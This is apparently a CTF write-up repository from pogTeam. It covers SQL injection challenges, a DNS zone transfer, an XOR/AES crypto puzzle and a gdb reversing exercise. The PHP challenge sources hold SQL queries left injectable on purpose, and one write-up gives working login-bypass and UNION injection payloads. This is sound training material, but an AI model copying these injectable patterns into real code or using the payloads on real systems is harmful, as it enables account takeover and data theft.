$result = $conn->query($query);
} else {
$query = "SELECT * FROM secrets WHERE session_id = '" . session_id() . "'";
$result = $conn->query($query);
}
?>
<!DOCTYPE HTML>
<html>
<head>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
</head>
<body>
<div id="custom-bootstrap-menu" class="navbar navbar-default " role="navigation">
<div class="container-fluid">
<div class="navbar-header"><a class="navbar-brand" href="#">Secret Diary</a>
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-menubuilder"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span>
</button>
</div>
<div class="collapse navbar-collapse navbar-menubuilder">
<ul class="nav navbar-nav navbar-left">
<li><a href="#">Home</a>
</li>
</ul>
</div>
</div>
</div>
<div class="container-fluid">
<?php
if (isset($_POST['secret'])) {
echo '<div class="alert alert-success" role="alert">Secret added successfully. You can view your secrets with the following session ID : '. session_id() .'</div>';
}
?>
<div class="row">
<div class="col-md-2"></div>
<div class="col-md-4">
<form method="POST" action="/level1.php">
<div class="input-group">
<input type="text" name="session_id" class="form-control" placeholder="Your session ID" aria-describedby="basic-addon2">
<span class="input-group-btn">
<button class="btn btn-default" type="submit">Get your secrets!</button>
</span>
</div>
</form>
</div>
<div class="col-md-4">
<form method="POST" action="/level1.php">
<div class="input-group">
<input type="text" name="secret" class="form-control" placeholder="Your secret" aria-describedby="basic-addon2">
<span class="input-group-btn">
<button class="btn btn-default" type="submit">Add a new secret!</button>
</span>
</div>
</form>
</div>
<div class="col-md-2"></div>
</div>
</div>
<br/>
<br/>
<br/>
<div class="container-fluid">
<div class="row">
<div class="col-md-4"></div>
<div class="col-md-4">
<div class="panel panel-default">
<div class="panel-heading">Your secrets</div>
<!-- Table -->
<table class="table">
<?php
if (isset($result) && $result->num_rows > 0) {
// output data of each row
while($row = $result->fetch_assoc()) {
echo "<tr><td>" . htmlspecialchars($row['secret']) . "</td></tr>";
}
} else {
echo "<tr><td>You don't have any secrets yet.</td></tr>";
}
?>
</table>
</div>
</div>
<div class="col-md-4"></div>
</div>
</div>
<script
src="https://code.jquery.com/jquery-3.1.1.min.js"
integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</body>
</html>
17 | 1
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level1/level1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/sqlinjChalls/level1/level1.png
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/README.md:
--------------------------------------------------------------------------------
1 | I think an administrator blocked my account. Can you help me steal someone else's account?
2 |
3 | Note: There are two flags in this challenge.
4 |
5 | 
6 |
7 | Again, we started trying basic stuff:
8 |
9 | user: ' or 1=1 --
10 | pass: ' or 1=1 --
11 |
12 | And guess what, it partially worked!
13 |
14 | 
15 |
16 | Now, for the second flag
17 |
18 | user: ' UNION SELECT flag FROM my_secret_table --
19 | pass: ' anything
20 |
21 | 
22 |
23 | There you go :)
24 |
25 | ## Why it works
26 |
27 | First thing to notice while skimming the code is this comic (and sad) comment:
28 |
29 | // $query = "SELECT flag FROM my_secret_table"; We leave commented code in production because we're cool.
30 |
31 | Right after it:
32 |
33 | $query = "SELECT username FROM users where username = '" . $_POST['username'] . "' and password = ?";
34 |
35 | Later in the code we see the logic used to validate the user.
36 |
37 | ~~~~
38 | // Bind password param
39 | $query->bind_param("s", $_POST['password']);
40 | $query->execute();
41 | $query->bind_result($user);
42 | $query->fetch();
43 |
44 | // Check if a valid user has been found
45 | if ($user != NULL) {
46 | session_start();
47 | $_SESSION['is_logged_in'] = true;
48 | $_SESSION['username'] = $user;
49 | } else {
50 | $error = true;
51 | $error_msg = "Wrong! Username/Password is invalid.";
52 | }
53 | ~~~~
54 |
55 | The password field is first binded to the query. Then, it is executed, saving the results in the $user variable. If any user is found, you are in and your flag is printed.
56 |
57 | Our final query then is:
58 |
59 | "SELECT username FROM users where username = '' UNION SELECT flag FROM my_secret_table -- ' and password = anything"
60 |
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/flag1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/sqlinjChalls/level2/flag1.png
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/flag2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/sqlinjChalls/level2/flag2.png
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/level2.php:
--------------------------------------------------------------------------------
1 |
2 |
16 | <?php
if (isset($_GET['source'])) {
die(highlight_file(__FILE__));
}
require("conf/level2.conf.php");
error_reporting(0);
if (isset($_POST['username']) && isset($_POST['password'])) {
// $query = "SELECT flag FROM my_secret_table"; We leave commented code in production because we're cool.
$query = "SELECT username FROM users where username = '" . $_POST['username'] . "' and password = ?";
// We use prepared statements, it must be secure.
$query = $conn->prepare($query);
// If query is invalid
if ($query === false) {
$error = true;
$error_msg = "<strong>Error!</strong> Invalid SQL query";
} else {
// Bind password param
$query->bind_param("s", $_POST['password']);
$query->execute();
$query->bind_result($user);
$query->fetch();
// Check if a valid user has been found
if ($user != NULL) {
session_start();
$_SESSION['is_logged_in'] = true;
$_SESSION['username'] = $user;
} else {
$error = true;
$error_msg = "<strong>Wrong!</strong> Username/Password is invalid.";
}
}
}
?>
<!DOCTYPE HTML>
<html>
<head>
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<style>
.corb-body { background-color: #333;}
.centered {
position: fixed;
top: 50%;
left: 50%;
/* bring your own prefixes */
transform: translate(-50%, -50%);
}
.corb-login-length { width: 500px;}
.corb-submit { position: relative; left: auto; right: -420px;}
.corb-flag { color: #0F0; }
.corb-alert { margin-top: 20px; }
</style>
</head>
<body class="corb-body container-fluid">
<?php if ($_SESSION['is_logged_in'] !== true) { ?>
<?php if (isset($error) && $error === true) { ?>
<div class="container-fluid corb-alert">
<div class="alert alert-danger">
<?php echo $error_msg; ?>
</div>
</div>
<?php } ?>
<div class="row">
<div class="centered">
<div class="well">
<h3 class="corb-login-length">Login If You Can</h3>
<br/>
<form method="POST">
<input name="username" class="form-control" type="text" placeholder="username">
<br/>
<input name="password" class="form-control" type="text" placeholder="password">
<br/>
<input name="submit" class="corb-submit btn btn-primary btn-lg" type="submit" value="Login">
</form>
</div>
</div>
</div>
<?php }else { ?>
<div class="centered">
<h1 class="corb-flag">Welcome <?php echo $_SESSION['username']; ?>! Here's some green text for you.</h1>
<h1 class="corb-flag"><?php echo $flag; ?></h1>
</div>
<?php } ?>
<script
src="https://code.jquery.com/jquery-3.1.1.min.js"
integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
</body>
</html>
<?php
session_destroy();
?>
17 |
18 | 1
--------------------------------------------------------------------------------
/2017/sqlinjChalls/level2/level2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2017/sqlinjChalls/level2/level2.png
--------------------------------------------------------------------------------
/2018/EasyCTF/digging_for_soup.md:
--------------------------------------------------------------------------------
1 | ~~~
2 | Perhaps this time I'll have hidden things a little better... you won't find my flag so easily now! nicebowlofsoup.com
3 | HINT: How do slave zones know when updates are made to the master?
4 | ~~~
5 |
6 | First thing to notice here is that accessing `nicebowlofsoup.com` leads to a 404 error. According to the hint and the title, the solution pobably relies on `dig`and `zone transfers`.
7 |
8 | Lets give it a first try.
9 |
10 | ~~~
11 | $ dig nicebowlofsoup.com any
12 |
13 | ; <<>> DiG 9.10.3-P4-Debian <<>> nicebowlofsoup.com any
14 | ;; global options: +cmd
15 | ;; Got answer:
16 | ;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 2135
17 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
18 |
19 | ;; OPT PSEUDOSECTION:
20 | ; EDNS: version: 0, flags:; udp: 4096
21 | ;; QUESTION SECTION:
22 | ;nicebowlofsoup.com.INANY
23 |
24 | ;; Query time: 17 msec
25 | ;; SERVER: 2804:14c:6510:672:189:6:0:182#53(2804:14c:6510:672:189:6:0:182)
26 | ;; WHEN: Mon Feb 12 18:08:36 -02 2018
27 | ;; MSG SIZE rcvd: 47
28 | ~~~
29 |
30 | Nice, an IPv6 server address! So now we can query this server using `-6` option.
31 |
32 | ~~~
33 | $ dig -6 @2804:14c:6510:672:189:6:0:182 nicebowlofsoup.com any
34 |
35 | ; <<>> DiG 9.10.3-P4-Debian <<>> -6 @2804:14c:6510:672:189:6:0:182 nicebowlofsoup.com any
36 | ; (1 server found)
37 | ;; global options: +cmd
38 | ;; Got answer:
39 | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6071
40 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 1
41 |
42 | ;; OPT PSEUDOSECTION:
43 | ; EDNS: version: 0, flags:; udp: 4096
44 | ;; QUESTION SECTION:
45 | ;nicebowlofsoup.com.INANY
46 |
47 | ;; ANSWER SECTION:
48 | nicebowlofsou p.com.100INTXT"Close, but no cigar... where else could it be? hint: the nameserver's IP is 159.65.43.62"
49 | nicebowlofsoup.com.86400INSOA ns1.nicebowlofsoup.com. hostmaster.nicebowlofsoup.com. 2018021205 28800 7200 604800 86400
50 | nicebowlofsoup.com.170405INNSns2.nicebowlofsoup.c om.
51 | nicebowlofsoup.com.170405INNSns1.nicebowlofsoup.com.
52 |
53 | ;; AUTHOR ITY SECTION:
54 | nicebowlofsoup.com.170405INNSns2.nicebowlofsoup.com.
55 | n icebowlofsoup.com.170405INNSns1.nicebowlofsoup.com.
56 |
57 | ;; Query time: 148 msec
58 | ;; SERVER: 2804:14c:6510:672:189:6:0:182#53(2804:14c:6510:672:189:6:0:182)
59 | ;; WHEN: Mon Feb 12 17:54:55 -02 2018
60 | ;; MSG SIZE rcvd: 259
61 | ~~~
62 |
63 | Ok, now that we have the nameserver's IPv4 address, lets try the zone transfer.
64 |
65 | ~~~
66 | $ dig @159.65.43.62 nicebowlofsoup.com axfr
67 |
68 | ; <<>> DiG 9.10.3-P4-Debian <<>> @159.65.43.62 nicebowlofsoup.com axfr
69 | ; (1 server found)
70 | ;; global options: +cmd
71 | nicebowlofsoup.com.86400INSOAns1.nicebowlofsoup.com. hos tmaster.nicebowlofsoup.com. 2018021205 28800 7200 604800 86400
72 | easyctf.nicebowlofsoup.com. 10INTXT"easyctf{why_do_i_even_have_this_domain}"
73 | nicebowlo fsoup.com.100INTXT"Close, but no cigar... where else could it be? h int: the nameserver's IP is 159.65.43.62"
74 | nicebowlofsoup.com.86400IN SOAns1.nicebowlofsoup.com. hostmaster.nicebowlofsoup.com. 2018021205 2 8800 7200 604800 86400
75 | ;; Query time: 438 msec
76 | ;; SERVER: 159.65.43.62#53(159.65.43.62)
77 | ;; WHEN: Mon Feb 12 18:03:28 -02 2018
78 | ;; XFR size: 4 records (messages 3, bytes 404)
79 | ~~~
80 |
81 | :)
82 |
--------------------------------------------------------------------------------
/2018/Pragyan/crypto/xmen_or_the_avengers/README.md:
--------------------------------------------------------------------------------
1 | # Xmen OR the avengers (100pts)
2 |
3 | ~~~
4 | The legion of doom is expecting an impending attack from a group of superheroes. they are not sure if it is the Xmen OR the avengers. They have received some information from a spy, a zip file containing the following files:
5 |
6 | info_crypt.txt
7 |
8 | info_clear.txt
9 |
10 | superheroes_group_info_crypt.txt
11 |
12 | Help the legion of doom in decrypting the last file so they can prepare themselves and prevent their impending doom.
13 | ~~~
14 |
15 | ~~~
16 | import base64
17 | import hashlib
18 | from Crypto.Cipher import AES
19 |
20 | def readfile(path):
21 | with open(path, 'r') as f:
22 | return f.read()
23 |
24 | def xor(s1, s2):
25 | return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2))
26 |
27 | #read the files
28 | clear = readfile('info_clear.txt')
29 | crypt = readfile('info_crypt.txt')
30 | superhero = readfile('superheroes_group_info_crypt.txt')
31 | superhero = base64.b64decode(superhero)
32 |
33 | #get the key
34 | dec = xor(clear,crypt).rstrip('\n').encode('utf-8')
35 | print(dec)
36 | key = hashlib.md5(dec).hexdigest().encode()
37 | print(key)
38 |
39 | #decrypt aes-ecb
40 | cipher = AES.new(key, AES.MODE_ECB)
41 | msg = cipher.decrypt(superhero)
42 | print("***POGTEAM*** >> " + msg)
43 | ~~~
44 |
--------------------------------------------------------------------------------
/2018/Pragyan/crypto/xmen_or_the_avengers/info_clear.txt:
--------------------------------------------------------------------------------
1 | greetings fellow villains, my identity will not be revaled just yet, i am giving you an opportunity to defend yourselves well in advance before your impending doom from the superheroes, i am not exactly with you or agains you, but i very well know that i do want to help you.
2 |
--------------------------------------------------------------------------------
/2018/Pragyan/crypto/xmen_or_the_avengers/info_crypt.txt:
--------------------------------------------------------------------------------
1 | �R��T�N�
2 | D��L
��N"EL�����@YM
3 | P�
� T��YT��L�U�
4 | �h��O��XA%E�MJ���R�E�J��H�MG����N�H��UI2NG����R��N�
A����
5 | �K@JB��U:
6 | ���E�A�E�
DI�T�D���� R���
7 | �EW���RY��P��D���������F��MIS�EN��P�����O���M�k�MI�O�e��A��� L�I��RY6�UO\�OI�
8 | �]�W��_�+U"O�C�E��RW���SQN^E�@]HZ�GM�Z�� �� ZA�
9 | ����MA[��
--------------------------------------------------------------------------------
/2018/Pragyan/crypto/xmen_or_the_avengers/superheroes_group_info_crypt.txt:
--------------------------------------------------------------------------------
1 | TIOXvVLnSbKhy97xqLy9K661Z937apKw2Oq2D0cyki62fSXi1RSQVP9lLoDPQywq
2 |
--------------------------------------------------------------------------------
/2018/Pragyan/reverse/assemble/README.md:
--------------------------------------------------------------------------------
1 |
2 | # Assemble your way to the flag (50 pts)
3 |
4 | ~~~
5 | My friend was trying out assembly for the first time, he has no clue what he's doing, help him out and procure your reward in the form of a flag :)
6 | ~~~
7 |
8 | ~~~
9 | $ gdb -q ./question
10 | Reading symbols from ./question...(no debugging symbols found)...done.
11 | gdb-peda$ run
12 | Starting program: /home/valle/Downloads/question
13 | Look for something else....
14 | [Inferior 1 (process 1612) exited normally]
15 | Warning: not running or target is remote
16 | gdb-peda$ pdisass main
17 | Dump of assembler code for function main:
18 | 0x00005555555546a0 <+0>: push rbp
19 | 0x00005555555546a1 <+1>: mov rbp,rsp
20 | 0x00005555555546a4 <+4>: lea rdi,[rip+0x2b9] # 0x555555554964
21 | 0x00005555555546ab <+11>: mov eax,0x0
22 | 0x00005555555546b0 <+16>: mov rax,0x50
23 | 0x00005555555546b7 <+23>: mov rbx,0x2d
24 | 0x00005555555546be <+30>: xor rax,rbx
25 | 0x00005555555546c1 <+33>: push rax
26 | 0x00005555555546c2 <+34>: mov rax,0xc1
27 | 0x00005555555546c9 <+41>: mov rbx,0xb8
28 | 0x00005555555546d0 <+48>: xor rax,rbx
29 | 0x00005555555546d3 <+51>: push rax
30 | 0x00005555555546d4 <+52>: mov rax,0x51
31 | 0x00005555555546db <+59>: mov rbx,0x60
32 | 0x00005555555546e2 <+66>: xor rax,rbx
33 | 0x00005555555546e5 <+69>: push rax
34 | 0x00005555555546e6 <+70>: mov rax,0x33
35 | 0x00005555555546ed <+77>: mov rbx,0x51
36 | 0x00005555555546f4 <+84>: xor rax,rbx
37 | 0x00005555555546f7 <+87>: push rax
38 | 0x00005555555546f8 <+88>: mov rax,0x45
39 | 0x00005555555546ff <+95>: mov rbx,0x28
40 | 0x0000555555554706 <+102>: xor rax,rbx
41 | 0x0000555555554709 <+105>: push rax
42 | 0x000055555555470a <+106>: mov rax,0x9b
43 | 0x0000555555554711 <+113>: mov rbx,0xa8
44 | 0x0000555555554718 <+120>: xor rax,rbx
45 | 0x000055555555471b <+123>: push rax
46 | 0x000055555555471c <+124>: mov rax,0x71
47 | 0x0000555555554723 <+131>: mov rbx,0x2
48 | 0x000055555555472a <+138>: xor rax,rbx
49 | 0x000055555555472d <+141>: push rax
50 | 0x000055555555472e <+142>: mov rax,0x8b
51 | 0x0000555555554735 <+149>: mov rbx,0xd8
52 | 0x000055555555473c <+156>: xor rax,rbx
53 | 0x000055555555473f <+159>: push rax
54 | 0x0000555555554740 <+160>: mov rax,0x98
55 | 0x0000555555554747 <+167>: mov rbx,0xac
56 | 0x000055555555474e <+174>: xor rax,rbx
57 | 0x0000555555554751 <+177>: push rax
58 | 0x0000555555554752 <+178>: mov rax,0x8e
59 | 0x0000555555554759 <+185>: mov rbx,0xd1
60 | 0x0000555555554760 <+192>: xor rax,rbx
61 | 0x0000555555554763 <+195>: push rax
62 | 0x0000555555554764 <+196>: mov rax,0x66
63 | 0x000055555555476b <+203>: mov rbx,0x8
64 | 0x0000555555554772 <+210>: xor rax,rbx
65 | 0x0000555555554775 <+213>: push rax
66 | 0x0000555555554776 <+214>: mov rax,0xa9
67 | 0x000055555555477d <+221>: mov rbx,0x98
68 | 0x0000555555554784 <+228>: xor rax,rbx
69 | 0x0000555555554787 <+231>: push rax
70 | 0x0000555555554788 <+232>: mov rax,0x65
71 | 0x000055555555478f <+239>: mov rbx,0x3a
72 | 0x0000555555554796 <+246>: xor rax,rbx
73 | 0x0000555555554799 <+249>: push rax
74 | 0x000055555555479a <+250>: mov rax,0x7e
75 | 0x00005555555547a1 <+257>: mov rbx,0x4d
76 | 0x00005555555547a8 <+264>: xor rax,rbx
77 | 0x00005555555547ab <+267>: push rax
78 | 0x00005555555547ac <+268>: mov rax,0x10
79 | 0x00005555555547b3 <+275>: mov rbx,0x74
80 | 0x00005555555547ba <+282>: xor rax,rbx
81 | 0x00005555555547bd <+285>: push rax
82 | 0x00005555555547be <+286>: mov rax,0x6b
83 | 0x00005555555547c5 <+293>: mov rbx,0x5b
84 | 0x00005555555547cc <+300>: xor rax,rbx
85 | 0x00005555555547cf <+303>: push rax
86 | 0x00005555555547d0 <+304>: mov rax,0x98
87 | 0x00005555555547d7 <+311>: mov rbx,0xfb
88 | 0x00005555555547de <+318>: xor rax,rbx
89 | 0x00005555555547e1 <+321>: push rax
90 | 0x00005555555547e2 <+322>: mov rax,0xc5
91 | 0x00005555555547e9 <+329>: mov rbx,0x9a
92 | 0x00005555555547f0 <+336>: xor rax,rbx
93 | 0x00005555555547f3 <+339>: push rax
94 | 0x00005555555547f4 <+340>: mov rax,0x37
95 | 0x00005555555547fb <+347>: mov rbx,0x44
96 | 0x0000555555554802 <+354>: xor rax,rbx
97 | 0x0000555555554805 <+357>: push rax
98 | 0x0000555555554806 <+358>: mov rax,0x92
99 | 0x000055555555480d <+365>: mov rbx,0xf6
100 | 0x0000555555554814 <+372>: xor rax,rbx
101 | 0x0000555555554817 <+375>: push rax
102 | 0x0000555555554818 <+376>: mov rax,0x44
103 | 0x000055555555481f <+383>: mov rbx,0xa
104 | 0x0000555555554826 <+390>: xor rax,rbx
105 | 0x0000555555554829 <+393>: push rax
106 | 0x000055555555482a <+394>: mov rax,0x80
107 | 0x0000555555554831 <+401>: mov rbx,0xe5
108 | 0x0000555555554838 <+408>: xor rax,rbx
109 | 0x000055555555483b <+411>: push rax
110 | 0x000055555555483c <+412>: mov rax,0xc8
111 | 0x0000555555554843 <+419>: mov rbx,0xaf
112 | 0x000055555555484a <+426>: xor rax,rbx
113 | 0x000055555555484d <+429>: push rax
114 | 0x000055555555484e <+430>: mov rax,0x26
115 | 0x0000555555554855 <+437>: mov rbx,0x15
116 | 0x000055555555485c <+444>: xor rax,rbx
117 | 0x000055555555485f <+447>: push rax
118 | 0x0000555555554860 <+448>: mov rax,0x3e
119 | 0x0000555555554867 <+455>: mov rbx,0x52
120 | 0x000055555555486e <+462>: xor rax,rbx
121 | 0x0000555555554871 <+465>: push rax
122 | 0x0000555555554872 <+466>: mov rax,0x9a
123 | 0x0000555555554879 <+473>: mov rbx,0xe1
124 | 0x0000555555554880 <+480>: xor rax,rbx
125 | 0x0000555555554883 <+483>: push rax
126 | 0x0000555555554884 <+484>: mov rax,0x13
127 | 0x000055555555488b <+491>: mov rbx,0x75
128 | 0x0000555555554892 <+498>: xor rax,rbx
129 | 0x0000555555554895 <+501>: push rax
130 | 0x0000555555554896 <+502>: mov rax,0xa2
131 | 0x000055555555489d <+509>: mov rbx,0xd6
132 | 0x00005555555548a4 <+516>: xor rax,rbx
133 | 0x00005555555548a7 <+519>: push rax
134 | 0x00005555555548a8 <+520>: mov rax,0xbe
135 | 0x00005555555548af <+527>: mov rbx,0xdd
136 | 0x00005555555548b6 <+534>: xor rax,rbx
137 | 0x00005555555548b9 <+537>: push rax
138 | 0x00005555555548ba <+538>: mov rax,0xac
139 | 0x00005555555548c1 <+545>: mov rbx,0xdc
140 | 0x00005555555548c8 <+552>: xor rax,rbx
141 | 0x00005555555548cb <+555>: push rax
142 | 0x00005555555548cc <+556>: call 0x555555554560
143 | 0x00005555555548d1 <+561>: mov eax,0x0
144 | 0x00005555555548d6 <+566>: add rsp,0xf0
145 | 0x00005555555548dd <+573>: pop rbp
146 | 0x00005555555548de <+574>: ret
147 | End of assembler dump.
148 | gdb-peda$ break main
149 | Breakpoint 1 at 0x5555555546a4
150 | gdb-peda$ break *0x00005555555548d1
151 | Breakpoint 2 at 0x5555555548d1
152 | gdb-peda$ run
153 | Starting program: /home/valle/Downloads/question
154 |
155 | [----------------------------------registers-----------------------------------]
156 | RAX: 0x5555555546a0 (: push rbp)
157 | RBX: 0x0
158 | RCX: 0x0
159 | RDX: 0x7fffffffe168 --> 0x7fffffffe47a ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
160 | RSI: 0x7fffffffe158 --> 0x7fffffffe45b ("/home/valle/Downloads/question")
161 | RDI: 0x1
162 | RBP: 0x7fffffffe070 --> 0x5555555548e0 (<__libc_csu_init>: push r15)
163 | RSP: 0x7fffffffe070 --> 0x5555555548e0 (<__libc_csu_init>: push r15)
164 | RIP: 0x5555555546a4 (: lea rdi,[rip+0x2b9] # 0x555555554964)
165 | R8 : 0x555555554950 (<__libc_csu_fini>: repz ret)
166 | R9 : 0x7ffff7de8cb0 (<_dl_fini>: push rbp)
167 | R10: 0x4
168 | R11: 0x1
169 | R12: 0x555555554570 (<_start>: xor ebp,ebp)
170 | R13: 0x7fffffffe150 --> 0x1
171 | R14: 0x0
172 | R15: 0x0
173 | EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
174 | [-------------------------------------code-------------------------------------]
175 | 0x55555555469b : jmp 0x5555555545e0
176 | 0x5555555546a0 : push rbp
177 | 0x5555555546a1 : mov rbp,rsp
178 | => 0x5555555546a4 : lea rdi,[rip+0x2b9] # 0x555555554964
179 | 0x5555555546ab : mov eax,0x0
180 | 0x5555555546b0 : mov rax,0x50
181 | 0x5555555546b7 : mov rbx,0x2d
182 | 0x5555555546be : xor rax,rbx
183 | [------------------------------------stack-------------------------------------]
184 | 0000| 0x7fffffffe070 --> 0x5555555548e0 (<__libc_csu_init>: push r15)
185 | 0008| 0x7fffffffe078 --> 0x7ffff7a5a2b1 (<__libc_start_main+241>: mov edi,eax)
186 | 0016| 0x7fffffffe080 --> 0x40000
187 | 0024| 0x7fffffffe088 --> 0x7fffffffe158 --> 0x7fffffffe45b ("/home/valle/Downloads/question")
188 | 0032| 0x7fffffffe090 --> 0x1f7b9b2e8
189 | 0040| 0x7fffffffe098 --> 0x5555555546a0 (: push rbp)
190 | 0048| 0x7fffffffe0a0 --> 0x0
191 | 0056| 0x7fffffffe0a8 --> 0x9ad5913901955e19
192 | [------------------------------------------------------------------------------]
193 | Legend: code, data, rodata, value
194 |
195 | Breakpoint 1, 0x00005555555546a4 in main ()
196 | gdb-peda$ c
197 | Continuing.
198 | Look for something else....
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 | [----------------------------------registers-----------------------------------]
209 | RAX: 0x1c
210 | RBX: 0xdc
211 | RCX: 0x7ffff7b15760 (<__write_nocancel+7>: cmp rax,0xfffffffffffff001)
212 | RDX: 0x7ffff7dd5760 --> 0x0
213 | RSI: 0x555555756010 ("Look for something else....\n")
214 | RDI: 0x555555756010 ("Look for something else....\n")
215 | RBP: 0x7fffffffe070 --> 0x5555555548e0 (<__libc_csu_init>: push r15)
216 | RSP: 0x7fffffffdf80 --> 0x70 ('p')
217 | RIP: 0x5555555548d1 (: mov eax,0x0)
218 | R8 : 0x555555756000 --> 0x0
219 | R9 : 0x1c
220 | R10: 0x7ffff7dd3b58 --> 0x555555756410 --> 0x0
221 | R11: 0x246
222 | R12: 0x555555554570 (<_start>: xor ebp,ebp)
223 | R13: 0x7fffffffe150 --> 0x1
224 | R14: 0x0
225 | R15: 0x0
226 | EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
227 | [-------------------------------------code-------------------------------------]
228 | 0x5555555548c8 : xor rax,rbx
229 | 0x5555555548cb : push rax
230 | 0x5555555548cc : call 0x555555554560
231 | => 0x5555555548d1 : mov eax,0x0
232 | 0x5555555548d6 : add rsp,0xf0
233 | 0x5555555548dd : pop rbp
234 | 0x5555555548de : ret
235 | 0x5555555548df: nop
236 | [------------------------------------stack-------------------------------------]
237 | 0000| 0x7fffffffdf80 --> 0x70 ('p')
238 | 0008| 0x7fffffffdf88 --> 0x63 ('c')
239 | 0016| 0x7fffffffdf90 --> 0x74 ('t')
240 | 0024| 0x7fffffffdf98 --> 0x66 ('f')
241 | 0032| 0x7fffffffdfa0 --> 0x7b ('{')
242 | 0040| 0x7fffffffdfa8 --> 0x6c ('l')
243 | 0048| 0x7fffffffdfb0 --> 0x33 ('3')
244 | 0056| 0x7fffffffdfb8 --> 0x67 ('g')
245 | [------------------------------------------------------------------------------]
246 | Legend: code, data, rodata, value
247 |
248 | Breakpoint 2, 0x00005555555548d1 in main ()
249 |
250 | 0x7fffffffdff0: 0x00000030 0x00000000
251 | gdb-peda$ x/30ws 0x7fffffffdf80
252 | 0x7fffffffdf80: U"p"
253 | 0x7fffffffdf88: U"c"
254 | 0x7fffffffdf90: U"t"
255 | 0x7fffffffdf98: U"f"
256 | 0x7fffffffdfa0: U"{"
257 | 0x7fffffffdfa8: U"l"
258 | 0x7fffffffdfb0: U"3"
259 | 0x7fffffffdfb8: U"g"
260 | 0x7fffffffdfc0: U"e"
261 | 0x7fffffffdfc8: U"N"
262 | 0x7fffffffdfd0: U"d"
263 | 0x7fffffffdfd8: U"s"
264 | 0x7fffffffdfe0: U"_"
265 | 0x7fffffffdfe8: U"c"
266 | 0x7fffffffdff0: U"0"
267 | 0x7fffffffdff8: U"d"
268 | 0x7fffffffe000: U"3"
269 | 0x7fffffffe008: U"_"
270 | 0x7fffffffe010: U"1"
271 | 0x7fffffffe018: U"n"
272 | 0x7fffffffe020: U"_"
273 | 0x7fffffffe028: U"4"
274 | 0x7fffffffe030: U"S"
275 | 0x7fffffffe038: U"s"
276 | 0x7fffffffe040: U"3"
277 | 0x7fffffffe048: U"m"
278 | 0x7fffffffe050: U"b"
279 | 0x7fffffffe058: U"1"
280 | 0x7fffffffe060: U"y"
281 | 0x7fffffffe068: U"}"
282 | ~~~
283 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # writeups
2 | Solutions from multiple CTFs we have played.
3 |
4 | # Resources
5 |
6 | ## General practice
7 |
8 | * http://ctftime.org/
9 | * http://hackthebox.eu/
10 | * https://www.vulnhub.com/
11 | * http://pwnable.kr/
12 | * https://hack.me
13 | * http://root-me.org/
14 |
15 | ### Reverse Engineering
16 |
17 | * The Shellcoder's Handbook
18 | * Hacking: The Art of Exploitation
19 | * https://exploit-exercises.com/nebula
20 | * http://pwnable.kr/
21 |
22 | ### Web
23 |
24 | * The Web Application Hacker's Handbook
25 | * https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
26 | * https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
27 | * https://xss-game.appspot.com/
28 | * https://hack.me/t/XSS
29 |
30 | ### Crypto
31 |
32 | * http://cryptopals.com/
33 | * https://www.coursera.org/learn/crypto
34 |
--------------------------------------------------------------------------------